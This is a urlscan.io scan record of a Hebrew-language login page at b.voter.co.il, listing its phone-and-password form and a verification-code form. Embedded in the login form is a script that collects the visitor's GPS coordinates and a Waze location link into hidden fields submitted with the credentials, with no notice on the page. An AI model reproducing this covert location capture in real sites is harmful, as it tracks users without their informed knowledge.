b.voter.co.il Open in urlscan Pro
2606:4700:3035::ac43:84a6  Public Scan

URL: https://b.voter.co.il/
Submission: On March 07 via api from US — Scanned from US

Form analysis 2 forms found in the DOM

POST

<form action="" method="post">
  <div class="form-group has-feedback">
    <label class="form-label text-dark">טלפון</label>
    <input type="text" class="form-control input-lg" inputmode="numeric" required="required" placeholder="מס טלפון" name="teacherphone" value="">
  </div>
  <div class="form-group has-feedback">
    <label class="form-label text-dark">סיסמה</label>
    <input type="password" class="form-control input-lg" required="required" placeholder="סיסמה" name="userpass" value="">
  </div>
  <div class="form-group">
    <label class="custom-control custom-checkbox">
      <a href="forgot-password.html" class="float-end small text-dark mt-1">שכחתי סיסמה</a>
      <input type="checkbox" checked="" class="custom-control-input">
      <span class="custom-control-label text-dark">זכור אותי</span>
    </label>
    <div id="locationData2"></div>
    <div id="latitude"></div>
    <div id="longitude"></div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
      $(document).ready(function myfunction() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(locationSuccess);
        } else {
          $("#locationData").html('Your browser does not support location data retrieval.');
        }

        function locationSuccess(position) {
          var latitude = position.coords.latitude;
          var longitude = position.coords.longitude;
          $("#locationData2").html("<input type='hidden' name='gps' value='https://ul.waze.com/ul?ll=" + latitude + "%2C" + longitude + "&navigate=yes&utm_campaign=default&utm_source=waze_website&utm_medium=lm_share_location'>");
          $("#latitude").html("<input type='hidden' name='latitude' value='" + latitude + "'>");
          $("#longitude").html("<input type='hidden' name='longitude' value='" + longitude + "'>");
        }
      });
    </script>
  </div>
  <div class="form-footer mt-2">
    <button type="submit" class="btn btn-primary btn-block" name="btnlogin">כניסה</button>
  </div>
</form>

POST

<form action="" method="post">
  <div class="form-group has-feedback">
    <label class="form-label text-dark">טלפון</label>
    <input type="text" class="form-control input-lg" inputmode="numeric" name="varnum" placeholder="נא להכניס קוד אימות שקיבלת">
  </div>
  <div class="form-footer mt-2">
    <button type="submit" class="btn btn-primary btn-block" name="verf">כניסה</button>
  </div>
</form>

Text Content

כניסה למערכת

טלפון
סיסמה
שכחתי סיסמה זכור אותי



כניסה


כניסה למערכת

טלפון
כניסה